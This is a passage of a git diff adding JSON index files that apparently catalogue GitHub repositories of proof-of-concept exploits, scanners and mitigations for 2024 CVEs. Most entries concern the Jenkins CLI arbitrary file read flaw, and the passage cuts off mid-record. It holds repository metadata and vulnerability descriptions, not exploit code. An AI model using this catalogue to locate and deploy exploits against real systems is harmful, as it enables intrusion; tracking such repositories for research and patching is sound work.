+ "name": "CVE-2024-23722-poc",
+ "full_name": "alexcote1\/CVE-2024-23722-poc",
+ "owner": {
+ "login": "alexcote1",
+ "id": 22797946,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/22797946?v=4",
+ "html_url": "https:\/\/github.com\/alexcote1"
+ },
+ "html_url": "https:\/\/github.com\/alexcote1\/CVE-2024-23722-poc",
+ "description": null,
+ "fork": false,
+ "created_at": "2024-03-25T17:50:33Z",
+ "updated_at": "2024-03-26T13:12:34Z",
+ "pushed_at": "2024-05-08T19:33:35Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2024/CVE-2024-23727.json b/2024/CVE-2024-23727.json
new file mode 100644
index 0000000000..ab4905a1ef
--- /dev/null
+++ b/2024/CVE-2024-23727.json
@@ -0,0 +1,35 @@
+[
+ {
+ "id": 714795483,
+ "name": "yi",
+ "full_name": "actuator\/yi",
+ "owner": {
+ "login": "actuator",
+ "id": 78701239,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/78701239?v=4",
+ "html_url": "https:\/\/github.com\/actuator"
+ },
+ "html_url": "https:\/\/github.com\/actuator\/yi",
+ "description": "CVE-2023-47882 | CVE-2024-23727",
+ "fork": false,
+ "created_at": "2023-11-05T20:37:24Z",
+ "updated_at": "2024-03-24T16:26:09Z",
+ "pushed_at": "2024-03-24T16:16:58Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "cve-2023-47882",
+ "cve-2024-23727"
+ ],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 2
+ }
+]
\ No newline at end of file
diff --git a/2024/CVE-2024-23738.json b/2024/CVE-2024-23738.json
new file mode 100644
index 0000000000..0153f1745d
--- /dev/null
+++ b/2024/CVE-2024-23738.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 748194668,
+ "name": "CVE-2024-23738",
+ "full_name": "giovannipajeu1\/CVE-2024-23738",
+ "owner": {
+ "login": "giovannipajeu1",
+ "id": 83291215,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/83291215?v=4",
+ "html_url": "https:\/\/github.com\/giovannipajeu1"
+ },
+ "html_url": "https:\/\/github.com\/giovannipajeu1\/CVE-2024-23738",
+ "description": "CVE-2024-23738",
+ "fork": false,
+ "created_at": "2024-01-25T13:27:19Z",
+ "updated_at": "2024-01-28T09:51:00Z",
+ "pushed_at": "2024-01-25T13:32:14Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2024/CVE-2024-23739.json b/2024/CVE-2024-23739.json
new file mode 100644
index 0000000000..c587275c91
--- /dev/null
+++ b/2024/CVE-2024-23739.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 748201476,
+ "name": "CVE-2024-23739",
+ "full_name": "giovannipajeu1\/CVE-2024-23739",
+ "owner": {
+ "login": "giovannipajeu1",
+ "id": 83291215,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/83291215?v=4",
+ "html_url": "https:\/\/github.com\/giovannipajeu1"
+ },
+ "html_url": "https:\/\/github.com\/giovannipajeu1\/CVE-2024-23739",
+ "description": "CVE-2024-23739",
+ "fork": false,
+ "created_at": "2024-01-25T13:44:16Z",
+ "updated_at": "2024-03-06T02:09:46Z",
+ "pushed_at": "2024-01-25T13:48:13Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2024/CVE-2024-23740.json b/2024/CVE-2024-23740.json
new file mode 100644
index 0000000000..bed39e927f
--- /dev/null
+++ b/2024/CVE-2024-23740.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 748198610,
+ "name": "CVE-2024-23740",
+ "full_name": "giovannipajeu1\/CVE-2024-23740",
+ "owner": {
+ "login": "giovannipajeu1",
+ "id": 83291215,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/83291215?v=4",
+ "html_url": "https:\/\/github.com\/giovannipajeu1"
+ },
+ "html_url": "https:\/\/github.com\/giovannipajeu1\/CVE-2024-23740",
+ "description": " CVE-2024-23739",
+ "fork": false,
+ "created_at": "2024-01-25T13:37:08Z",
+ "updated_at": "2024-01-25T13:43:33Z",
+ "pushed_at": "2024-01-25T13:43:24Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2024/CVE-2024-23741.json b/2024/CVE-2024-23741.json
new file mode 100644
index 0000000000..973cf498b6
--- /dev/null
+++ b/2024/CVE-2024-23741.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 748203643,
+ "name": "CVE-2024-23741",
+ "full_name": "giovannipajeu1\/CVE-2024-23741",
+ "owner": {
+ "login": "giovannipajeu1",
+ "id": 83291215,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/83291215?v=4",
+ "html_url": "https:\/\/github.com\/giovannipajeu1"
+ },
+ "html_url": "https:\/\/github.com\/giovannipajeu1\/CVE-2024-23741",
+ "description": "CVE-2024-23741",
+ "fork": false,
+ "created_at": "2024-01-25T13:49:10Z",
+ "updated_at": "2024-01-25T13:49:10Z",
+ "pushed_at": "2024-01-25T13:51:23Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2024/CVE-2024-23742.json b/2024/CVE-2024-23742.json
new file mode 100644
index 0000000000..48e0e1e3c1
--- /dev/null
+++ b/2024/CVE-2024-23742.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 748204912,
+ "name": "CVE-2024-23742",
+ "full_name": "giovannipajeu1\/CVE-2024-23742",
+ "owner": {
+ "login": "giovannipajeu1",
+ "id": 83291215,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/83291215?v=4",
+ "html_url": "https:\/\/github.com\/giovannipajeu1"
+ },
+ "html_url": "https:\/\/github.com\/giovannipajeu1\/CVE-2024-23742",
+ "description": "CVE-2024-23742",
+ "fork": false,
+ "created_at": "2024-01-25T13:52:05Z",
+ "updated_at": "2024-01-26T05:58:50Z",
+ "pushed_at": "2024-01-25T13:55:20Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2024/CVE-2024-23743.json b/2024/CVE-2024-23743.json
new file mode 100644
index 0000000000..e4253f1ad6
--- /dev/null
+++ b/2024/CVE-2024-23743.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 733590093,
+ "name": "CVE-2024-23743",
+ "full_name": "giovannipajeu1\/CVE-2024-23743",
+ "owner": {
+ "login": "giovannipajeu1",
+ "id": 83291215,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/83291215?v=4",
+ "html_url": "https:\/\/github.com\/giovannipajeu1"
+ },
+ "html_url": "https:\/\/github.com\/giovannipajeu1\/CVE-2024-23743",
+ "description": null,
+ "fork": false,
+ "created_at": "2023-12-19T17:07:27Z",
+ "updated_at": "2024-03-12T06:08:21Z",
+ "pushed_at": "2024-01-25T13:56:48Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2024/CVE-2024-23745.json b/2024/CVE-2024-23745.json
new file mode 100644
index 0000000000..7c09cd1063
--- /dev/null
+++ b/2024/CVE-2024-23745.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 748384236,
+ "name": "CVE-2024-23745",
+ "full_name": "louiselalanne\/CVE-2024-23745",
+ "owner": {
+ "login": "louiselalanne",
+ "id": 100588945,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/100588945?v=4",
+ "html_url": "https:\/\/github.com\/louiselalanne"
+ },
+ "html_url": "https:\/\/github.com\/louiselalanne\/CVE-2024-23745",
+ "description": "In Notion Web Clipper 1.0.3(7), a .nib file is susceptible to the Dirty NIB attack.",
+ "fork": false,
+ "created_at": "2024-01-25T21:20:40Z",
+ "updated_at": "2024-03-12T08:48:47Z",
+ "pushed_at": "2024-01-25T22:15:12Z",
+ "stargazers_count": 2,
+ "watchers_count": 2,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 2,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2024/CVE-2024-23746.json b/2024/CVE-2024-23746.json
new file mode 100644
index 0000000000..cafcfbf447
--- /dev/null
+++ b/2024/CVE-2024-23746.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 748435064,
+ "name": "CVE-2024-23746",
+ "full_name": "louiselalanne\/CVE-2024-23746",
+ "owner": {
+ "login": "louiselalanne",
+ "id": 100588945,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/100588945?v=4",
+ "html_url": "https:\/\/github.com\/louiselalanne"
+ },
+ "html_url": "https:\/\/github.com\/louiselalanne\/CVE-2024-23746",
+ "description": "Miro Desktop 0.8.18 on macOS allows Electron code injection.",
+ "fork": false,
+ "created_at": "2024-01-26T00:39:20Z",
+ "updated_at": "2024-01-26T00:39:20Z",
+ "pushed_at": "2024-01-26T14:00:20Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2024/CVE-2024-23747.json b/2024/CVE-2024-23747.json
new file mode 100644
index 0000000000..ad1c484805
--- /dev/null
+++ b/2024/CVE-2024-23747.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 748435966,
+ "name": "CVE-2024-23747",
+ "full_name": "louiselalanne\/CVE-2024-23747",
+ "owner": {
+ "login": "louiselalanne",
+ "id": 100588945,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/100588945?v=4",
+ "html_url": "https:\/\/github.com\/louiselalanne"
+ },
+ "html_url": "https:\/\/github.com\/louiselalanne\/CVE-2024-23747",
+ "description": "Moderna Sistemas ModernaNet Hospital Management System 2024 is susceptible to an Insecure Direct Object Reference (IDOR) vulnerability",
+ "fork": false,
+ "created_at": "2024-01-26T00:43:29Z",
+ "updated_at": "2024-01-26T00:43:30Z",
+ "pushed_at": "2024-01-26T09:32:25Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2024/CVE-2024-23772.json b/2024/CVE-2024-23772.json
new file mode 100644
index 0000000000..0c67fb5462
--- /dev/null
+++ b/2024/CVE-2024-23772.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 753041144,
+ "name": "CVE-2024-23772",
+ "full_name": "Verrideo\/CVE-2024-23772",
+ "owner": {
+ "login": "Verrideo",
+ "id": 33281087,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/33281087?v=4",
+ "html_url": "https:\/\/github.com\/Verrideo"
+ },
+ "html_url": "https:\/\/github.com\/Verrideo\/CVE-2024-23772",
+ "description": null,
+ "fork": false,
+ "created_at": "2024-02-05T10:58:33Z",
+ "updated_at": "2024-02-05T10:58:33Z",
+ "pushed_at": "2024-02-05T11:04:16Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2024/CVE-2024-23773.json b/2024/CVE-2024-23773.json
new file mode 100644
index 0000000000..06dc07adcd
--- /dev/null
+++ b/2024/CVE-2024-23773.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 753041259,
+ "name": "CVE-2024-23773",
+ "full_name": "Verrideo\/CVE-2024-23773",
+ "owner": {
+ "login": "Verrideo",
+ "id": 33281087,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/33281087?v=4",
+ "html_url": "https:\/\/github.com\/Verrideo"
+ },
+ "html_url": "https:\/\/github.com\/Verrideo\/CVE-2024-23773",
+ "description": null,
+ "fork": false,
+ "created_at": "2024-02-05T10:58:50Z",
+ "updated_at": "2024-02-05T10:58:51Z",
+ "pushed_at": "2024-02-05T11:03:54Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2024/CVE-2024-23774.json b/2024/CVE-2024-23774.json
new file mode 100644
index 0000000000..f02e6ab665
--- /dev/null
+++ b/2024/CVE-2024-23774.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 753041345,
+ "name": "CVE-2024-23774",
+ "full_name": "Verrideo\/CVE-2024-23774",
+ "owner": {
+ "login": "Verrideo",
+ "id": 33281087,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/33281087?v=4",
+ "html_url": "https:\/\/github.com\/Verrideo"
+ },
+ "html_url": "https:\/\/github.com\/Verrideo\/CVE-2024-23774",
+ "description": null,
+ "fork": false,
+ "created_at": "2024-02-05T10:59:03Z",
+ "updated_at": "2024-02-05T10:59:03Z",
+ "pushed_at": "2024-02-05T11:02:39Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2024/CVE-2024-23780.json b/2024/CVE-2024-23780.json
new file mode 100644
index 0000000000..2afd77dcaf
--- /dev/null
+++ b/2024/CVE-2024-23780.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 769096857,
+ "name": "CVE-2024-23780",
+ "full_name": "HazardLab-IO\/CVE-2024-23780",
+ "owner": {
+ "login": "HazardLab-IO",
+ "id": 162697088,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/162697088?v=4",
+ "html_url": "https:\/\/github.com\/HazardLab-IO"
+ },
+ "html_url": "https:\/\/github.com\/HazardLab-IO\/CVE-2024-23780",
+ "description": "Netbox - CVE-2024-23780",
+ "fork": false,
+ "created_at": "2024-03-08T10:39:59Z",
+ "updated_at": "2024-03-08T10:48:18Z",
+ "pushed_at": "2024-03-08T10:49:10Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2024/CVE-2024-2389.json b/2024/CVE-2024-2389.json
new file mode 100644
index 0000000000..8729fc15a5
--- /dev/null
+++ b/2024/CVE-2024-2389.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 785250757,
+ "name": "CVE-2024-2389",
+ "full_name": "adhikara13\/CVE-2024-2389",
+ "owner": {
+ "login": "adhikara13",
+ "id": 44716348,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/44716348?v=4",
+ "html_url": "https:\/\/github.com\/adhikara13"
+ },
+ "html_url": "https:\/\/github.com\/adhikara13\/CVE-2024-2389",
+ "description": null,
+ "fork": false,
+ "created_at": "2024-04-11T14:03:23Z",
+ "updated_at": "2024-06-18T15:57:47Z",
+ "pushed_at": "2024-04-11T14:33:01Z",
+ "stargazers_count": 2,
+ "watchers_count": 2,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 2,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2024/CVE-2024-23897.json b/2024/CVE-2024-23897.json
new file mode 100644
index 0000000000..ba105347cb
--- /dev/null
+++ b/2024/CVE-2024-23897.json
@@ -0,0 +1,909 @@
+[
+ {
+ "id": 747359905,
+ "name": "SECURITY-3314-3315",
+ "full_name": "jenkinsci-cert\/SECURITY-3314-3315",
+ "owner": {
+ "login": "jenkinsci-cert",
+ "id": 9285726,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/9285726?v=4",
+ "html_url": "https:\/\/github.com\/jenkinsci-cert"
+ },
+ "html_url": "https:\/\/github.com\/jenkinsci-cert\/SECURITY-3314-3315",
+ "description": "Workaround for disabling the CLI to mitigate SECURITY-3314\/CVE-2024-23897 and SECURITY-3315\/CVE-2024-23898",
+ "fork": false,
+ "created_at": "2024-01-23T19:19:04Z",
+ "updated_at": "2024-03-31T14:14:47Z",
+ "pushed_at": "2024-02-20T14:13:25Z",
+ "stargazers_count": 6,
+ "watchers_count": 6,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 6,
+ "score": 0,
+ "subscribers_count": 6
+ },
+ {
+ "id": 748543127,
+ "name": "CVE-2024-23897",
+ "full_name": "binganao\/CVE-2024-23897",
+ "owner": {
+ "login": "binganao",
+ "id": 70050083,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/70050083?v=4",
+ "html_url": "https:\/\/github.com\/binganao"
+ },
+ "html_url": "https:\/\/github.com\/binganao\/CVE-2024-23897",
+ "description": null,
+ "fork": false,
+ "created_at": "2024-01-26T08:02:00Z",
+ "updated_at": "2024-06-24T09:23:19Z",
+ "pushed_at": "2024-02-01T06:50:32Z",
+ "stargazers_count": 96,
+ "watchers_count": 96,
+ "has_discussions": false,
+ "forks_count": 10,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 10,
+ "watchers": 96,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 748577478,
+ "name": "CVE-2024-23897",
+ "full_name": "h4x0r-dz\/CVE-2024-23897",
+ "owner": {
+ "login": "h4x0r-dz",
+ "id": 26070859,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/26070859?v=4",
+ "html_url": "https:\/\/github.com\/h4x0r-dz"
+ },
+ "html_url": "https:\/\/github.com\/h4x0r-dz\/CVE-2024-23897",
+ "description": "CVE-2024-23897",
+ "fork": false,
+ "created_at": "2024-01-26T09:44:32Z",
+ "updated_at": "2024-06-25T07:47:42Z",
+ "pushed_at": "2024-01-28T06:47:28Z",
+ "stargazers_count": 181,
+ "watchers_count": 181,
+ "has_discussions": false,
+ "forks_count": 35,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 35,
+ "watchers": 181,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 748785405,
+ "name": "CVE-2024-23897",
+ "full_name": "xaitax\/CVE-2024-23897",
+ "owner": {
+ "login": "xaitax",
+ "id": 5014849,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5014849?v=4",
+ "html_url": "https:\/\/github.com\/xaitax"
+ },
+ "html_url": "https:\/\/github.com\/xaitax\/CVE-2024-23897",
+ "description": "CVE-2024-23897 | Jenkins <= 2.441 & <= LTS 2.426.2 PoC and scanner. ",
+ "fork": false,
+ "created_at": "2024-01-26T19:00:03Z",
+ "updated_at": "2024-06-10T13:50:20Z",
+ "pushed_at": "2024-02-29T12:13:21Z",
+ "stargazers_count": 54,
+ "watchers_count": 54,
+ "has_discussions": false,
+ "forks_count": 19,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 19,
+ "watchers": 54,
+ "score": 0,
+ "subscribers_count": 3
+ },
+ {
+ "id": 748847022,
+ "name": "poc-cve-2024-23897",
+ "full_name": "vmtyan\/poc-cve-2024-23897",
+ "owner": {
+ "login": "vmtyan",
+ "id": 157635595,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/157635595?v=4",
+ "html_url": "https:\/\/github.com\/vmtyan"
+ },
+ "html_url": "https:\/\/github.com\/vmtyan\/poc-cve-2024-23897",
+ "description": null,
+ "fork": false,
+ "created_at": "2024-01-26T21:39:26Z",
+ "updated_at": "2024-02-12T18:38:29Z",
+ "pushed_at": "2024-01-26T21:46:10Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 748932948,
+ "name": "CVE-2024-23897",
+ "full_name": "yoryio\/CVE-2024-23897",
+ "owner": {
+ "login": "yoryio",
+ "id": 134471901,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/134471901?v=4",
+ "html_url": "https:\/\/github.com\/yoryio"
+ },
+ "html_url": "https:\/\/github.com\/yoryio\/CVE-2024-23897",
+ "description": "Scanner for CVE-2024-23897 - Jenkins",
+ "fork": false,
+ "created_at": "2024-01-27T04:35:20Z",
+ "updated_at": "2024-02-09T17:37:28Z",
+ "pushed_at": "2024-03-13T05:52:30Z",
+ "stargazers_count": 2,
+ "watchers_count": 2,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "cve-2024-23897",
+ "jenkins"
+ ],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 2,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 749052396,
+ "name": "CVE-2024-23897",
+ "full_name": "3yujw7njai\/CVE-2024-23897",
+ "owner": {
+ "login": "3yujw7njai",
+ "id": 7390055,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/7390055?v=4",
+ "html_url": "https:\/\/github.com\/3yujw7njai"
+ },
+ "html_url": "https:\/\/github.com\/3yujw7njai\/CVE-2024-23897",
+ "description": "CVE-2024-23897 jenkins-cli",
+ "fork": false,
+ "created_at": "2024-01-27T12:57:28Z",
+ "updated_at": "2024-06-26T01:15:11Z",
+ "pushed_at": "2024-01-27T13:10:37Z",
+ "stargazers_count": 12,
+ "watchers_count": 12,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 12,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 749060845,
+ "name": "PoC-Fix-jenkins-rce_CVE-2024-23897",
+ "full_name": "10T4\/PoC-Fix-jenkins-rce_CVE-2024-23897",
+ "owner": {
+ "login": "10T4",
+ "id": 148342080,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/148342080?v=4",
+ "html_url": "https:\/\/github.com\/10T4"
+ },
+ "html_url": "https:\/\/github.com\/10T4\/PoC-Fix-jenkins-rce_CVE-2024-23897",
+ "description": "on this git you can find all information on the CVE-2024-23897",
+ "fork": false,
+ "created_at": "2024-01-27T13:27:57Z",
+ "updated_at": "2024-03-18T21:30:46Z",
+ "pushed_at": "2024-01-27T14:43:18Z",
+ "stargazers_count": 6,
+ "watchers_count": 6,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 6,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 749172653,
+ "name": "CVE-2024-23897",
+ "full_name": "wjlin0\/CVE-2024-23897",
+ "owner": {
+ "login": "wjlin0",
+ "id": 91306421,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/91306421?v=4",
+ "html_url": "https:\/\/github.com\/wjlin0"
+ },
+ "html_url": "https:\/\/github.com\/wjlin0\/CVE-2024-23897",
+ "description": "CVE-2024-23897 - Jenkins 任意文件读取 利用工具",
+ "fork": false,
+ "created_at": "2024-01-27T19:34:48Z",
+ "updated_at": "2024-06-16T22:34:00Z",
+ "pushed_at": "2024-03-16T07:55:41Z",
+ "stargazers_count": 62,
+ "watchers_count": 62,
+ "has_discussions": false,
+ "forks_count": 10,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "cve",
+ "cve-2024-23897",
+ "jenkins"
+ ],
+ "visibility": "public",
+ "forks": 10,
+ "watchers": 62,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 749248494,
+ "name": "CVE-2024-23897",
+ "full_name": "Vozec\/CVE-2024-23897",
+ "owner": {
+ "login": "Vozec",
+ "id": 61807609,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/61807609?v=4",
+ "html_url": "https:\/\/github.com\/Vozec"
+ },
+ "html_url": "https:\/\/github.com\/Vozec\/CVE-2024-23897",
+ "description": "This repository presents a proof-of-concept of CVE-2024-23897",
+ "fork": false,
+ "created_at": "2024-01-28T01:57:06Z",
+ "updated_at": "2024-06-21T00:11:59Z",
+ "pushed_at": "2024-04-16T06:56:39Z",
+ "stargazers_count": 11,
+ "watchers_count": 11,
+ "has_discussions": false,
+ "forks_count": 2,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 2,
+ "watchers": 11,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 749389006,
+ "name": "CVE-2024-23897",
+ "full_name": "raheel0x01\/CVE-2024-23897",
+ "owner": {
+ "login": "raheel0x01",
+ "id": 65211256,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/65211256?v=4",
+ "html_url": "https:\/\/github.com\/raheel0x01"
+ },
+ "html_url": "https:\/\/github.com\/raheel0x01\/CVE-2024-23897",
+ "description": "Jenkins 2.441 and earlier, LTS 2.426.2 and earlier does not disable a feature of its CLI command parser that replaces an '@' character followed by a file path in an argument with the file's contents, allowing unauthenticated attackers to read arbitrary files on the Jenkins controller file system.",
+ "fork": false,
+ "created_at": "2024-01-28T12:53:23Z",
+ "updated_at": "2024-01-29T18:53:19Z",
+ "pushed_at": "2024-01-28T13:28:09Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 749635165,
+ "name": "CVE-2024-23897",
+ "full_name": "viszsec\/CVE-2024-23897",
+ "owner": {
+ "login": "viszsec",
+ "id": 8476317,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/8476317?v=4",
+ "html_url": "https:\/\/github.com\/viszsec"
+ },
+ "html_url": "https:\/\/github.com\/viszsec\/CVE-2024-23897",
+ "description": "Jenkins POC of Arbitrary file read vulnerability through the CLI can lead to RCE",
